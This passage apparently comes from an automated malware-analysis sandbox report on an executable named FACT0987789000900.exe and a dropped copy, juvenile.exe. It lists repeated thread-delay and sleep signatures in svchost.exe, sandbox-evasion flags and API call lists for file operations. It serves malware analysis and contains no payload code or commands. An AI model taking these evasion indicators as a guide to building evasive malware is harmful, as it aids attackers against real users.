              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595546Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595437Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595328Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595218Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595108Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594994Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594890Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594670Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594555Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594399Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594280Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594170Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594061Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599516Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599406Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599296Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599188Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599063Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598938Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598828Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598696Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598587Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598391Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598250Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598140Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598031Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597922Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597703Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597594Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597483Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597375Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597047Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596938Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596827Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596718Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596609Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596500Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596391Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596266Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596156Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596047Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595937Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595817Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595599Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595331Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595093Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594984Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594765Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594547Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594438Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594313Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594188Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594063Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593938Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593828Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 7483Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 2347Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 4353Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 5470Jump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeEvaded block: after key decisiongraph_3-93804
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeEvaded block: after key decision
              Source: C:\Users\user\Desktop\FACT0987789000900.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_3-94690
              Source: C:\Users\user\Desktop\FACT0987789000900.exeAPI coverage: 4.5 %
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeAPI coverage: 4.8 %
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep count: 33 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -30437127721620741s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -599890s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7464Thread sleep count: 7483 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7464Thread sleep count: 2347 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -599670s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -599558s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -599453s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -599343s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -599234s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -599125s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -599015s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -598906s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -598797s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -598672s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -598562s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -598453s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -598342s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -598234s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -598125s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -598015s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -597906s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -597769s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -597631s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -597436s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -597309s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -597200s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -597093s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -596984s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -596875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -596765s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -596656s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -596547s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -596422s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -596312s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -596203s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -596093s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -595984s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -595874s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -595765s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -595656s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -595546s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -595437s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -595328s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -595218s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -595108s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -594994s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -594890s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -594670s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -594555s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -594399s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -594280s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -594170s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7460Thread sleep time: -594061s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep count: 40 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -36893488147419080s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7772Thread sleep count: 4353 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7772Thread sleep count: 5470 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -599766s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -599641s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -599516s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -599406s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -599296s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -599188s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -599063s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -598938s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -598828s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -598696s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -598587s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -598391s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -598250s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -598140s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -598031s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -597922s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -597812s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -597703s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -597594s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -597483s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -597375s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -597265s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -597156s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -597047s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -596938s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -596827s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -596718s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -596609s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -596500s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -596391s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -596266s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -596156s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -596047s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -595937s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -595817s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -595599s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -595331s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -595203s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -595093s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -594984s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -594875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -594765s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -594656s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -594547s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -594438s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -594313s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -594188s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -594063s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -593938s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 7756Thread sleep time: -593828s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004D6CA9 GetFileAttributesW,FindFirstFileW,FindClose,3_2_004D6CA9
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004D60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,3_2_004D60DD
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004D63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,3_2_004D63F9
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004DEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_004DEB60
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004DF56F FindFirstFileW,FindClose,3_2_004DF56F
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004DF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_004DF5FA
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004E1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_004E1B2F
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004E1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_004E1C8A
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004E1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_004E1F94
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_00916CA9 GetFileAttributesW,FindFirstFileW,FindClose,6_2_00916CA9
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_009160DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,6_2_009160DD
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_009163F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,6_2_009163F9
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0091EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0091EB60
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0091F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_0091F5FA
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_0091F56F FindFirstFileW,FindClose,6_2_0091F56F
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_00921B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00921B2F
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_00921C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00921C8A
              Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exeCode function: 6_2_00921F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00921F94
              Source: C:\Users\user\Desktop\FACT0987789000900.exeCode function: 3_2_004ADDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_004ADDC0
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599670Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599558Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599343Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598797Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598562Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598342Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598125Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598015Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597906Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597769Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597631Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597436Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597309Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597200Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597093Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596984Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596547Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596422Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596312Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596093Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595984Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595874Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595765Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595546Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595437Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595328Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595218Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595108Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594994Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594890Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594670Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594555Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594399Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594280Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594170Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594061Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599516Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599406Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599296Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599188Jump to behavior
